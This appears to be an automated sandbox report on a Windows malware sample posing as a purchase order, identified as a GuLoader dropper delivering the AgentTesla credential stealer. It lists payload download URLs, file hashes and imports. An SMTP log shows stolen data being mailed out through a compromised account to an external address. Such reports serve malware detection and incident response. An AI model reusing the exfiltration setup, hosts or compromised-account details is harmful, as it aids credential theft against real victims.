http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org%4	CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://smtp.construccionsjpallas.com	CasPol.exe, 0000000A.00000002.219017335150.000000001E078000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ervtqq.bl.files.1drv.com/.	CasPol.exe, 0000000A.00000003.214536706012.00000000010EB000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://SukKLs.com	CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Purchase Order PO20211027STK.exe	false		high
https://ervtqq.bl.files.1drv.com/y4mRWRDE7pcrW6w0EUTN84QjMAtO1dpCLEwXIJU8OszKkAmv-_nhkZHLAvXSNrUdeon	CasPol.exe, 0000000A.00000002.219005375157.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.214542533887.00000000010EB000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21126&authkey=AMKTKwd	CasPol.exe, 0000000A.00000002.219005034724.00000000010A4000.00000004.00000020.sdmp	false		high
https://bBdyMHz8DHQmQ5qFFNz.net	CasPol.exe, 0000000A.00000002.219017335150.000000001E078000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.215446466845.000000001CDB1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ervtqq.bl.files.1drv.com/	CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/	CasPol.exe, 0000000A.00000002.219004779835.000000000106B000.00000004.00000020.sdmp	false		high
https://ervtqq.bl.files.1drv.com/y4mjsZiy6S_ONFJ1Il5BkM5ipQEe7rgpRSJNcHXx-eH9OxEQcwqSz5uJCiVh7AEhgFP	CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214536282271.00000000010F0000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219005034724.00000000010A4000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
134.0.9.148	smtp.construccionsjpallas.com	Spain		197712	CDMONsistemescdmoncomES	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531732
Start date:	01.12.2021
Start time:	10:05:34
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Purchase Order PO20211027STK.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/2@3/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 88% Number of executed functions: 87 Number of non-executed functions: 33
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.207.122, 51.105.236.244, 13.107.42.13, 13.107.43.12, 52.109.76.32 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, l-0003.dc-msedge.net, ctldl.windowsupdate.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, prod.nexusrules.live.com.akadns.net, ris.api.iris.microsoft.com, l-0004.l-msedge.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, odc-bl-files-brs.onedrive.akadns.net, img-prod-cms-rt-microsoft-com.akamaized.net, odc-bl-files-geo.onedrive.akadns.net, nexusrules.officeapps.live.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:08:34	API Interceptor	2530x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CDMONsistemescdmoncomES	2YnVgiNH23	Get hash	malicious	Browse	46.16.59.125
	D3ccF8FfwAXrqsU.exe	Get hash	malicious	Browse	185.66.41.21
	EB94D7mept3gdSh.exe	Get hash	malicious	Browse	185.66.41.21
	aVzUZCHkko.exe	Get hash	malicious	Browse	185.66.41.201
	$RAULIU9.exe	Get hash	malicious	Browse	185.42.105.5
	3f52697f_by_Libranalysis.exe	Get hash	malicious	Browse	46.16.61.50
	0000000654.pdf.exe	Get hash	malicious	Browse	46.16.61.50
	0000000654.pdf.exe	Get hash	malicious	Browse	46.16.61.50
	ordine n#U00b0 276.exe	Get hash	malicious	Browse	46.16.61.250
	ordine n#U00b0 276.exe	Get hash	malicious	Browse	46.16.61.250
	a5FVSNazgr.exe	Get hash	malicious	Browse	46.16.61.250
	HdgnMEvcFK.exe	Get hash	malicious	Browse	46.16.61.250
	RTStyEQJpZ.exe	Get hash	malicious	Browse	46.16.61.250
	PAGO.xlsx	Get hash	malicious	Browse	46.16.61.250
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	46.16.61.250
	Zapytanie -20216470859302.exe	Get hash	malicious	Browse	46.16.61.250
	njGJ1eW44wshoMr.exe	Get hash	malicious	Browse	46.16.62.134
	3nG9LW7Z21dxUoM.exe	Get hash	malicious	Browse	46.16.62.134
	keeFDE9dhCGNNez.exe	Get hash	malicious	Browse	46.16.62.134
	74tF1foMeQyUMCh.exe	Get hash	malicious	Browse	46.16.62.134

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\SPORENE.exe	Purchase Order PO20211027STK.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\SPORENE.exe Download File
Process:	C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21321008
Entropy (8bit):	0.09325738133607682
Encrypted:	false
SSDEEP:	3072:mIXeoCC869BrI49jK9oUhJSSjfv8XEHPO:madlYoUZf2EvO
MD5:	582A642DF36CDAC38982E4842F370B44
SHA1:	3DD6D0CECD4CD9414D7DF148F7C46548C5709D62
SHA-256:	361DEDDF3E436753730DBB20842FBD6D1EF2EC27C56CD9DA99E87751C3BBE890
SHA-512:	E9C94417ACEF2B33DED79182C8B397E2693A74D290E78E286AE7576C998BF14F39F370C06BC40C9DFFDF2DE2E7F680AA0F33D74DB508E15EEAF1D31BE8D06BB6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Joe Sandbox View:	Filename: Purchase Order PO20211027STK.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L.....5Y.....................0C.....$.............@..........................@E.....,qE.........................................(.... ....C.........P@E.....................................................0... ....................................text............................... ..`.data...p...........................@....rsrc.....C.. ... C.. ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.060974988277113
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Purchase Order PO20211027STK.exe
File size:	131031
MD5:	2f2102ec5776497950e89e419515efee
SHA1:	1d3dd4ed88af22c3de29c918b37db6f0b73c94c4
SHA256:	7768da29cc4ef93cb4790f664e139d1d8c2972e22fe8840b6b86c50e15dba347
SHA512:	963b79cb63703ea6a6e8d70bbe76fadc660e10b801283a3812a76f773ee36210171437794dad0b4ee11e8a2f34645c88c7463526be03274ffdf48ec81823032a
SSDEEP:	3072:gbG7N2kDTHUpou4ubV4QviYqsYLQyI9xxsFIRO7c3fkA:gbE/HUjV4QviYJMQXyFIR2HA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F8D546BC67Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F8D546BC64Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4c000	0x11e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.666126179245	data	6.45839821493	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.439275568182	data	5.02410928126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.521484375	data	4.15458210409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x36000	0x16000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x4c000	0x11e0	0x1200	False	0.368489583333	data	4.48173978815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x4c268	0x368	data	English	United States
RT_ICON	0x4c5d0	0x2e8	data	English	United States
RT_DIALOG	0x4c8b8	0x144	data	English	United States
RT_DIALOG	0x4ca00	0x13c	data	English	United States
RT_DIALOG	0x4cb40	0x100	data	English	United States
RT_DIALOG	0x4cc40	0x11c	data	English	United States
RT_DIALOG	0x4cd60	0xc4	data	English	United States
RT_DIALOG	0x4ce28	0x60	data	English	United States
RT_GROUP_ICON	0x4ce88	0x14	data	English	United States
RT_MANIFEST	0x4cea0	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/01/21-10:10:01.566879	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49839	587	192.168.11.20	134.0.9.148

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 10:09:59.517446041 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:09:59.546245098 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:09:59.546425104 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.376899004 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.377335072 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.405778885 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.405833960 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.407454014 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.436321020 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.436815977 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.468705893 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.469347954 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.501142979 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.501499891 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.535028934 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.535347939 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.565152884 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.566879034 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.566962004 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.566975117 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.566984892 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:10:01.596278906 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.596359968 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.708368063 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:10:01.749802113 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:11:39.499531984 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:11:39.529752016 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:11:39.529827118 CET	587	49839	134.0.9.148	192.168.11.20
Dec 1, 2021 10:11:39.530057907 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:11:39.530895948 CET	49839	587	192.168.11.20	134.0.9.148
Dec 1, 2021 10:11:39.559269905 CET	587	49839	134.0.9.148	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 10:08:22.976635933 CET	61190	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:08:23.579670906 CET	65263	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:09:59.463979959 CET	53882	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:09:59.481276035 CET	53	53882	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 10:08:22.976635933 CET	192.168.11.20	1.1.1.1	0x5000	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:08:23.579670906 CET	192.168.11.20	1.1.1.1	0x7563	Standard query (0)	ervtqq.bl.files.1drv.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:09:59.463979959 CET	192.168.11.20	1.1.1.1	0xcb15	Standard query (0)	smtp.construccionsjpallas.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 10:08:22.986366987 CET	1.1.1.1	192.168.11.20	0x5000	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:08:23.766315937 CET	1.1.1.1	192.168.11.20	0x7563	No error (0)	ervtqq.bl.files.1drv.com	bl-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:08:23.766315937 CET	1.1.1.1	192.168.11.20	0x7563	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:09:59.481276035 CET	1.1.1.1	192.168.11.20	0xcb15	No error (0)	smtp.construccionsjpallas.com		134.0.9.148	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 1, 2021 10:10:01.376899004 CET	587	49839	134.0.9.148	192.168.11.20	220 vxade-59.srv.cat ESMTP
Dec 1, 2021 10:10:01.377335072 CET	49839	587	192.168.11.20	134.0.9.148	EHLO 374653
Dec 1, 2021 10:10:01.405833960 CET	587	49839	134.0.9.148	192.168.11.20	250-vxade-59.srv.cat 250-PIPELINING 250-SIZE 47185920 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Dec 1, 2021 10:10:01.407454014 CET	49839	587	192.168.11.20	134.0.9.148	AUTH login cXVhbGl0YXRAY29uc3RydWNjaW9uc2pwYWxsYXMuY29t
Dec 1, 2021 10:10:01.436321020 CET	587	49839	134.0.9.148	192.168.11.20	334 UGFzc3dvcmQ6
Dec 1, 2021 10:10:01.468705893 CET	587	49839	134.0.9.148	192.168.11.20	235 2.7.0 Authentication successful
Dec 1, 2021 10:10:01.469347954 CET	49839	587	192.168.11.20	134.0.9.148	MAIL FROM:<qualitat@construccionsjpallas.com>
Dec 1, 2021 10:10:01.501142979 CET	587	49839	134.0.9.148	192.168.11.20	250 2.1.0 Ok
Dec 1, 2021 10:10:01.501499891 CET	49839	587	192.168.11.20	134.0.9.148	RCPT TO:<frankkeneth01@gmail.com>
Dec 1, 2021 10:10:01.535028934 CET	587	49839	134.0.9.148	192.168.11.20	250 2.1.5 Ok
Dec 1, 2021 10:10:01.535347939 CET	49839	587	192.168.11.20	134.0.9.148	DATA
Dec 1, 2021 10:10:01.565152884 CET	587	49839	134.0.9.148	192.168.11.20	354 End data with <CR><LF>.<CR><LF>
Dec 1, 2021 10:10:01.566984892 CET	49839	587	192.168.11.20	134.0.9.148	.
Dec 1, 2021 10:10:01.708368063 CET	587	49839	134.0.9.148	192.168.11.20	250 2.0.0 Ok: queued as 7F0F42130D
Dec 1, 2021 10:11:39.499531984 CET	49839	587	192.168.11.20	134.0.9.148	QUIT
Dec 1, 2021 10:11:39.529752016 CET	587	49839	134.0.9.148	192.168.11.20	221 2.0.0 Bye

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Purchase Order PO20211027STK.exe PID: 4660 Parent PID: 7748

General

Start time:	10:07:25
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe"
Imagebase:	0x400000
File size:	131031 bytes
MD5 hash:	2F2102EC5776497950E89E419515EFEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: SPORENE.exe PID: 2100 Parent PID: 4660

General

Start time:	10:07:27
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\SPORENE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\SPORENE.exe
Imagebase:	0x400000
File size:	21321008 bytes
MD5 hash:	582A642DF36CDAC38982E4842F370B44
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 9%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: CasPol.exe PID: 528 Parent PID: 2100

General

Start time:	10:07:55
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\SPORENE.exe
Imagebase:	0xa80000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.214269025674.0000000000F00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 1720 Parent PID: 528

General

Start time:	10:07:56
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a3780000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Purchase Order PO20211027STK.exe PID: 4660 Parent PID: 7748 Purchase Order PO20211027STK.exeCOMMON

Executed Functions

Function 0040352D, Relevance: 88.0, APIs: 34, Strings: 16, Instructions: 450stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
